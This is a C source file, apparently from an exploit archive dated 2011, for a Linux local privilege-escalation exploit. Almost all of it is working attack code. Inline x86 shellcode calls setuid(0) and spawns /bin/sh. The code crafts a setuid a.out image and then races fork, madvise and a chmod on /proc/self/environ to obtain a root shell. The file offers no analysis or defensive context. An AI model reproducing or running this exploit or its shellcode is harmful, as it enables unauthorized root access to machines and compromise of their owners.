#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4. #include <unistd.h>
5. #include <fcntl.h>
6. #include <errno.h>
7. #include <sched.h>
8. #include <sys/types.h>
9. #include <sys/stat.h>
10. #include <sys/prctl.h>
11. #include <sys/mman.h>
12. #include <sys/wait.h>
13. #include <linux/a.out.h>
14. #include <asm/unistd.h>
15.  
16.  
17. static struct exec ex;
18. static char *e[256];
19. static char *a[4];
20. static char b[512];
21. static char t[256];
22. static volatile int *c;
23.  
24.  
25. /* shell code */
26. __asm__ (" __excode: call 1f \n"
27. " 1: mov $23, %eax \n"
28. " xor %ebx, %ebx \n"
29. " int $0x80 \n"
30. " pop %eax \n"
31. " mov $cmd-1b, %ebx \n"
32. " add %eax, %ebx \n"
33. " mov $arg-1b, %ecx \n"
34. " add %eax, %ecx \n"
35. " mov %ebx, (%ecx) \n"
36. " mov %ecx, %edx \n"
37. " add $4, %edx \n"
38. " mov $11, %eax \n"
39. " int $0x80 \n"
40. " mov $1, %eax \n"
41. " int $0x80 \n"
42. " arg: .quad 0x00, 0x00 \n"
43. " cmd: .string \"/bin/sh\" \n"
44. " __excode_e: nop \n"
45. " .global __excode \n"
46. " .global __excode_e \n"
47. );
48.  
49.  
50.  
51. extern void (*__excode) (void);
52. extern void (*__excode_e) (void);
53.  
54.  
55. void
56. error (char *err)
57. {
58. perror (err);
59. fflush (stderr);
60. exit (1);
61. }
62.  
63.  
64. /* exploit this shit */
65. void
66. exploit (char *file)
67. {
68. int i, fd;
69. void *p;
70. struct stat st;
71.  
72. printf ("\ntrying to exploit %s\n\n", file);
73. fflush (stdout);
74. chmod ("/proc/self/environ", 04755);
75. c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
76. memset ((void *) c, 0, 4096);
77.  
78. /* slow down machine */
79. fd = open (file, O_RDONLY);
80. fstat (fd, &st);
81. p =
82. (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
83. if (p == MAP_FAILED)
84. error ("mmap");
85. prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
86. sprintf (t, "/proc/%d/environ", getpid ());
87. sched_yield ();
88. execve (NULL, a, e);
89. madvise (0, 0, MADV_WILLNEED);
90. i = fork ();
91.  
92. /* give it a try */
93. if (i)
94. {
95. (*c)++;
96. !madvise (p, st.st_size, MADV_WILLNEED) ? : error ("madvise");
97. prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
98. sched_yield ();
99. }
100. else
101. {
102. nice(10);
103. while (!(*c));
104. sched_yield ();
105. execve (t, a, e);
106. error ("failed");
107. }
108.  
109. waitpid (i, NULL, 0);
110. exit (0);
111. }
112.  
113.  
114. int
115. main (int ac, char **av)
116. {
117. int i, j, k, s;
118. char *p;
119.  
120. memset (e, 0, sizeof (e));
121. memset (a, 0, sizeof (a));
122. a[0] = strdup (av[0]);
123. a[1] = strdup (av[0]);
124. a[2] = strdup (av[1]);
125.  
126. if (ac < 2)
127. error ("usage: binary <big file name>");
128. if (ac > 2)
129. exploit (av[2]);
130. printf ("\npreparing");
131. fflush (stdout);
132.  
133. /* make setuid a.out */
134. memset (&ex, 0, sizeof (ex));
135. N_SET_MAGIC (ex, NMAGIC);
136. N_SET_MACHTYPE (ex, M_386);
137. s = ((unsigned) &__excode_e) - (unsigned) &__excode;
138. ex.a_text = s;
139. ex.a_syms = -(s + sizeof (ex));
140.  
141. memset (b, 0, sizeof (b));
142. memcpy (b, &ex, sizeof (ex));
143. memcpy (b + sizeof (ex), &__excode, s);
144.  
145. /* make environment */
146. p = b;
147. s += sizeof (ex);
148. j = 0;
149. for (i = k = 0; i < s; i++)
150. {
151. if (!p[i])
152. {
153. e[j++] = &p[k];
154. k = i + 1;
155. }
156. }
157.  
158. /* reexec */
159. getcwd (t, sizeof (t));
160. strcat (t, "/");
161. strcat (t, av[0]);
162. execve (t, a, e);
163. error ("execve");
164. return 0;
165. }
166.  
167.  
168. # [2011-10-09]
169.